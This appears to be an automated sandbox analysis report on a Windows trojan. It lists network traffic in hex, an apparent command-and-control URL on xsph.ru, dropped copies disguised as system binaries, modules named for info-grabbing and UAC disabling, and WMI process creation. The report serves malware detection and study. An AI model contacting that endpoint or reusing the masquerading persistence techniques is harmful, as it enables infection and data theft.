2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:04:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:04:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027F0000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027BF000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.000000000278F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a1043195.xsph.ru
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.0000000002771000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.000000000278F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a1043195.xsph.ru/
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027F0000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.000000000278F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a1043195.xsph.ru/e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001D.00000002.2168378706.0000000000968000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.mic
Source: 4KjLUaW30K.exe, 00000000.00000002.2074993070.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.000000000278F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cp.sprinthost.ru
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cp.sprinthost.ru/auth/login
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://index.from.sh/pages/game.html

System Summary
barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Detected potential crypto function
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Code function: 0_2_00007FF848F33565 0_2_00007FF848F33565
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Code function: 0_2_00007FF848F39FB5 0_2_00007FF848F39FB5
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 20_2_00007FF848F0B08D 20_2_00007FF848F0B08D
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 20_2_00007FF848F03354 20_2_00007FF848F03354
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 20_2_00007FF848F0A29C 20_2_00007FF848F0A29C
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 20_2_00007FF848F02C10 20_2_00007FF848F02C10
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 20_2_00007FF848F02C10 20_2_00007FF848F02C10
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 20_2_00007FF848F0B04D 20_2_00007FF848F0B04D
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 20_2_00007FF848F0B0A5 20_2_00007FF848F0B0A5
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 20_2_00007FF848F02C10 20_2_00007FF848F02C10
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 20_2_00007FF848F09FB5 20_2_00007FF848F09FB5
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 22_2_00007FF848F13565 22_2_00007FF848F13565
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Code function: 22_2_00007FF848F19FB5 22_2_00007FF848F19FB5
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Code function: 25_2_00007FF848F13565 25_2_00007FF848F13565
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Code function: 25_2_00007FF848F19FB5 25_2_00007FF848F19FB5
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Code function: 27_2_00007FF848F43565 27_2_00007FF848F43565
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Code function: 27_2_00007FF848F49FB5 27_2_00007FF848F49FB5
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Code function: 28_2_00007FF848F23565 28_2_00007FF848F23565
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Code function: 28_2_00007FF848F29FB5 28_2_00007FF848F29FB5
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Code function: 29_2_00007FF848F33565 29_2_00007FF848F33565
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Code function: 29_2_00007FF848F39FB5 29_2_00007FF848F39FB5
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Code function: 30_2_00007FF848F29FB5 30_2_00007FF848F29FB5
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Code function: 30_2_00007FF848F23565 30_2_00007FF848F23565
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Code function: 31_2_00007FF848F49FB5 31_2_00007FF848F49FB5
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Code function: 31_2_00007FF848F43565 31_2_00007FF848F43565
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Code function: 32_2_00007FF848F33565 32_2_00007FF848F33565
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Code function: 32_2_00007FF848F39FB5 32_2_00007FF848F39FB5
Source: C:\Recovery\System.exe Code function: 33_2_00007FF848F13565 33_2_00007FF848F13565
Source: C:\Recovery\System.exe Code function: 33_2_00007FF848F19FB5 33_2_00007FF848F19FB5
Source: C:\Recovery\System.exe Code function: 34_2_00007FF848F19FB5 34_2_00007FF848F19FB5
Source: C:\Recovery\System.exe Code function: 34_2_00007FF848F13565 34_2_00007FF848F13565
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Code function: 37_2_00007FF848F1512D 37_2_00007FF848F1512D
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Code function: 37_2_00007FF848F17057 37_2_00007FF848F17057
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Code function: 37_2_00007FF848F14B59 37_2_00007FF848F14B59
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Code function: 37_2_00007FF848F161E1 37_2_00007FF848F161E1
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Code function: 37_2_00007FF848F126D8 37_2_00007FF848F126D8
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Code function: 37_2_00007FF848F12179 37_2_00007FF848F12179
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Code function: 37_2_00007FF848F03565 37_2_00007FF848F03565
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Code function: 37_2_00007FF848F09FB5 37_2_00007FF848F09FB5
Source: C:\Recovery\System.exe Code function: 38_2_00007FF848F29FB5 38_2_00007FF848F29FB5
Source: C:\Recovery\System.exe Code function: 38_2_00007FF848F23565 38_2_00007FF848F23565
PE file contains executable resources (Code or Archives)
Source: 4KjLUaW30K.exe Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: mnUYCZffXdEgQlZPiczLektp.exe.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: mnUYCZffXdEgQlZPiczLektp.exe0.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ShellExperienceHost.exe.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: dllhost.exe.0.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Sample file is different than original file name gathered from version info
Source: 4KjLUaW30K.exe, 00000000.00000000.2028330302.0000000000674000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074993070.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMiscInfoGrabber.dclib4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074993070.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074993070.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename( vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2102472012.000000001B9A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074623783.00000000029B0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMiscInfoGrabber.dclib4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074873324.00000000029D0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilename( vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2086148884.0000000012C22000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename$ vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2072779086.0000000000F70000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameDisableUAC.dclib4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2104376642.000000001BDA1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074339378.0000000002990000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilename( vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074823760.00000000029C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilename4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2073930444.0000000002970000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilename$ vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074993070.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDisableUAC.dclib4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074993070.0000000002B14000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename( vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 4KjLUaW30K.exe
Uses 32bit PE files
Source: 4KjLUaW30K.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 4KjLUaW30K.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: mnUYCZffXdEgQlZPiczLektp.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: mnUYCZffXdEgQlZPiczLektp.exe0.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ShellExperienceHost.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dllhost.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 4KjLUaW30K.exe, QYy0Hs0Ej6oohN07xsf.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4KjLUaW30K.exe, QYy0Hs0Ej6oohN07xsf.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4KjLUaW30K.exe, DBx1HnV2WnrVt2OJGyF.cs Cryptographic APIs: 'TransformBlock'
Source: 4KjLUaW30K.exe, DBx1HnV2WnrVt2OJGyF.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.evad.winEXE@33/31@1/1
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File created: C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File created: C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Jump to behavior
Source: C:\Recovery\System.exe Mutant created: NULL
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\d945671f81d9dd580b9f4721388aab3966aadb2c
Source: C:\Users\user\Desktop\4KjLUaW30K.exe File created: C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe Jump to behavior
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs"
Source: 4KjLUaW30K.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 4KjLUaW30K.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
